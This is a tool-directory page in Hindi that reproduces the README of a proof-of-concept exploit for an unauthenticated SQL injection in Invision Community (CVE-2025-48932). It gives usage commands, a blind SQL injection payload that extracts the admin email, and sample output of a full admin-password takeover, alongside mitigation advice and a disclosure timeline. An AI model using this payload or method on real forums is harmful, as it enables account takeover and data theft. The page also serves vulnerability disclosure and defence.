Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-48932---exploit | Kitploit
उपकरण/GitHubGitHub/xploitgh0st/cve-2025-48932---exploit
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubxploitgh0st/cve-2025-48932---exploit

CVE-2025-48932---exploit

रिपॉजिटरी देखें
29 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Invision Community SQL Injection Exploit (CVE-2025-48932)

Python Version License CVE

यह एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट है जो Invision Community संस्करण <= 4.7.20 में SQL इंजेक्शन भेद्यता को प्रदर्शित करता है।

⚠️ अस्वीकरण

यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।

  • कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है
  • इस टूल का उपयोग केवल उन्हीं सिस्टम पर करें जिनके स्वामी आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है
  • इस टूल के किसी भी दुरुपयोग या क्षति के लिए लेखक जिम्मेदार नहीं है
  • यह केवल सुरक्षा शोधकर्ताओं, पेनिट्रेशन टेस्टरों और शैक्षिक उद्देश्यों के लिए है

📋 विषय-सूची

  • भेद्यता विवरण
  • आवश्यकताएँ
  • स्थापना
  • उपयोग
  • यह कैसे काम करता है
  • शमन
  • श्रेय
  • संदर्भ

🔍 भेद्यता विवरण

CVE आईडी: CVE-2025-48932
गंभीरता: उच्च
CVSS स्कोर: TBD
प्रभावित संस्करण: 4.7.21 से पहले के Invision Community 4.x संस्करण

यह भेद्यता /applications/calendar/modules/front/calendar/view.php स्क्रिप्ट में मौजूद है। IPS\calendar\modules\front\calendar\view::search() विधि में location अनुरोध पैरामीटर के माध्यम से पारित उपयोगकर्ता इनपुट को SQL क्वेरी में उपयोग करने से पहले ठीक से सैनिटाइज़ नहीं किया जाता है।

यह दूरस्थ, अनधिकृत (unauthenticated) हमलावरों को निम्नलिखित की अनुमति देता है:

  • डेटाबेस से संवेदनशील डेटा निकालना
  • एडमिन क्रेडेंशियल पढ़ना
  • संभावित रूप से एडमिन खाते पर कब्ज़ा करना

शोषण के लिए पूर्वापेक्षाएँ:

  • कैलेंडर एप्लिकेशन स्थापित होना चाहिए
  • जियोलोकेशन सुविधा (जैसे Google Maps) कॉन्फ़िगर होनी चाहिए

नोट: जबकि Invision Community 4.x संस्करण < 4.7.18 में SQL इंजेक्शन भेद्यताएँ एडमिन पासवर्ड रीसेट करके एडमिन खाते पर कब्ज़ा और RCE का कारण बन सकती थीं, संस्करण 4.7.18 ने पासवर्ड रीसेट तंत्र में एक नई सुरक्षा एन्क्रिप्शन कुंजी पेश की, जिससे यह हमला वेक्टर अधिक कठिन हो गया है।

📦 आवश्यकताएँ

  • Python 3.7 या उच्चतर
  • pip (Python पैकेज मैनेजर)
  • इंटरनेट कनेक्शन
  • लक्षित सिस्टम जिस पर Invision Community <= 4.7.20 चल रहा हो, साथ में:
    • कैलेंडर एप्लिकेशन स्थापित
    • जियोलोकेशन सुविधा कॉन्फ़िगर

🚀 स्थापना

  1. रिपॉजिटरी क्लोन करें:

    root@kitploit:~
    git clone https://github.com/yourusername/invision-sqli-exploit.git
    cd invision-sqli-exploit
    
  2. निर्भरताएँ स्थापित करें:

    root@kitploit:~
    pip install -r requirements.txt
    

💻 उपयोग

बुनियादी उपयोग

root@kitploit:~
python invision-sqli-exploit.py -u http://target.com/forum/

वर्बोज़ मोड (डिबगिंग के लिए)

root@kitploit:~
python invision-sqli-exploit.py -u https://example.com/community/ -v

कमांड-लाइन आर्गुमेंट्स

उदाहरण आउटपुट

root@kitploit:~
==================================================
Invision Community <= 4.7.20 SQL Injection Exploit
CVE-2025-48932
==================================================
Target: http://example.com/forum/
==================================================

[*] Fetching CSRF token...
[+] CSRF token found: abc123def456...
[*] Step 1: Extracting admin email address...
[*] Extracting data: [email protected]
[+] Admin email: [email protected]

[!] Step 2: Manual action required!

Please follow these steps:
1. Navigate to: http://example.com/forum/index.php?/lostpassword/
2. Request a password reset using email: [email protected]
3. Press ENTER when done...

[*] Step 3: Extracting password reset validation key...
[*] Extracting data: xyz789abc123...
[+] Reset key: xyz789abc123...
[*] Step 4: Resetting admin password...

==================================================
[+] EXPLOITATION SUCCESSFUL!
==================================================

Admin credentials:
  Email:    [email protected]
  Password: Pwned1721234567

You can now login at: http://example.com/forum/index.php?/login/

🔬 यह कैसे काम करता है

यह एक्सप्लॉइट चार मुख्य चरणों में काम करता है:

1. CSRF टोकन निष्कर्षण

स्क्रिप्ट पहले लक्षित वेबसाइट से CSRF टोकन प्राप्त करती है, जो आगामी अनुरोधों के लिए आवश्यक है।

2. बूलियन-आधारित ब्लाइंड SQL इंजेक्शन

बाइनरी सर्च एल्गोरिदम का उपयोग करके, एक्सप्लॉइट डेटाबेस से डेटा को अक्षर-दर-अक्षर निकालता है:

  • कंडीशनल SQL क्वेरी का उपयोग करके प्रत्येक अक्षर का परीक्षण करता है
  • सत्य/असत्य स्थितियों का पता लगाने के लिए regex पैटर्न के साथ RLIKE फ़ंक्शन का उपयोग करता है
  • त्रुटि संदेश सफल स्थितियों का संकेत देते हैं

3. एडमिन ईमेल निष्कर्षण

एडमिन का ईमेल पता निकालने के लिए core_members तालिका में क्वेरी करता है।

4. पासवर्ड रीसेट शोषण

  • हमलावर मैन्युअल रूप से एडमिन खाते के लिए पासवर्ड रीसेट शुरू करता है
  • एक्सप्लॉइट डेटाबेस से पासवर्ड रीसेट वैलिडेशन कुंजी निकालता है
  • ईमेल एक्सेस के बिना एडमिन पासवर्ड रीसेट करने के लिए वैलिडेशन कुंजी का उपयोग करता है

तकनीकी विवरण

इंजेक्शन बिंदु:

root@kitploit:~
location parameter → calendar/view.php → search() method

पेलोड उदाहरण:

root@kitploit:~
'))OR(SELECT 1 RLIKE(IF(ORD(SUBSTR((SELECT email FROM core_members WHERE member_id=1),1,1))<128,0x28,0x31)))#

शोषण तकनीक: कुशल डेटा निष्कर्षण के लिए बाइनरी सर्च का उपयोग करने वाला बूलियन-आधारित ब्लाइंड SQL इंजेक्शन।

🛡️ शमन

उपयोगकर्ताओं के लिए

तत्काल कार्रवाइयाँ:

  1. संस्करण 4.7.21 या उसके बाद का अपग्रेड करें - यह संस्करण भेद्यता को पैच करता है
  2. कैलेंडर एप्लिकेशन अक्षम करें यदि उपयोग में नहीं है
  3. संदिग्ध गतिविधि के लिए एक्सेस लॉग की निगरानी करें
  4. अनधिकृत पहुँच के लिए एडमिन खातों की समीक्षा करें

डेवलपर्स के लिए

सुरक्षित कोडिंग प्रथाएँ:

  1. पैरामीटराइज़्ड क्वेरी/प्रीपेयर्ड स्टेटमेंट का उपयोग करें - उपयोगकर्ता इनपुट को SQL क्वेरी में कभी संयोजित न करें
  2. इनपुट सत्यापन - सभी उपयोगकर्ता इनपुट को सत्यापित और सैनिटाइज़ करें
  3. न्यूनतम विशेषाधिकार सिद्धांत - डेटाबेस उपयोगकर्ताओं के पास न्यूनतम आवश्यक अनुमतियाँ होनी चाहिए
  4. वेब एप्लिकेशन फ़ायरवॉल (WAF) - SQL इंजेक्शन प्रयासों का पता लगाने के लिए WAF नियम तैनात करें
  5. नियमित सुरक्षा ऑडिट - समय-समय पर कोड समीक्षा और पेनिट्रेशन परीक्षण करें

सुरक्षित कोड का उदाहरण:

root@kitploit:~
// Vulnerable code
$location = $_REQUEST['location'];
$query = "SELECT * FROM events WHERE location = '$location'";

// Secure code
$location = $_REQUEST['location'];
$query = $db->prepare("SELECT * FROM events WHERE location = ?");
$query->execute([$location]);

📅 प्रकटीकरण समयरेखा

तारीखघटना
May 16, 2025विक्रेता को सूचित किया गया
May 27, 2025संस्करण 4.7.21 जारी किया गया

👏 श्रेय

डेवलपर:

  • nanda

नोट: यह सार्वजनिक रूप से प्रकटित भेद्यता जानकारी (CVE-2025-48932) पर आधारित एक स्वतंत्र कार्यान्वयन है

📚 संदर्भ

  • CVE-2025-48932 विवरण
  • Invision Community आधिकारिक साइट
  • EDB-ID: 52383

📝 लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

🤝 योगदान

योगदान का स्वागत है! कृपया बेझिझक पुल रिक्वेस्ट सबमिट करें। बड़े बदलावों के लिए, कृपया पहले एक इश्यू खोलें ताकि आप जो बदलना चाहते हैं उस पर चर्चा की जा सके।

⚖️ कानूनी सूचना

यह टूल MIT लाइसेंस के अंतर्गत वितरित किया जाता है। इस सॉफ़्टवेयर का उपयोग करके, आप निम्नलिखित से सहमत होते हैं:

  1. इसका उपयोग केवल कानूनी और अधिकृत परीक्षण उद्देश्यों के लिए करें
  2. अपने कार्यों की पूर्ण जिम्मेदारी लें
  3. किसी भी दुरुपयोग या क्षति के लिए लेखक को उत्तरदायी न ठहराएँ
  4. सभी लागू कानूनों और विनियमों का अनुपालन करें

याद रखें: अधिकांश क्षेत्राधिकारों में कंप्यूटर सिस्टम तक अनधिकृत पहुँच एक अपराध है और इसके गंभीर कानूनी परिणाम हो सकते हैं।


यदि आपको कोई सुरक्षा भेद्यता मिलती है, तो कृपया इसे सार्वजनिक करने से पहले विक्रेता को जिम्मेदारीपूर्वक सूचित करें।

टूल डाउनलोड करें
आर्गुमेंटविवरणआवश्यक
-u, --urlलक्षित Invision Community बेस URLहाँ
-v, --verboseडिबगिंग के लिए वर्बोज़ आउटपुट सक्षम करेंनहीं
-h, --helpसहायता संदेश दिखाएँ और बाहर निकलेंनहीं
May 28, 2025
CVE पहचानकर्ता का अनुरोध किया गया
May 28, 2025CVE-2025-48932 निर्धारित किया गया
July 23, 2025सार्वजनिक प्रकटीकरण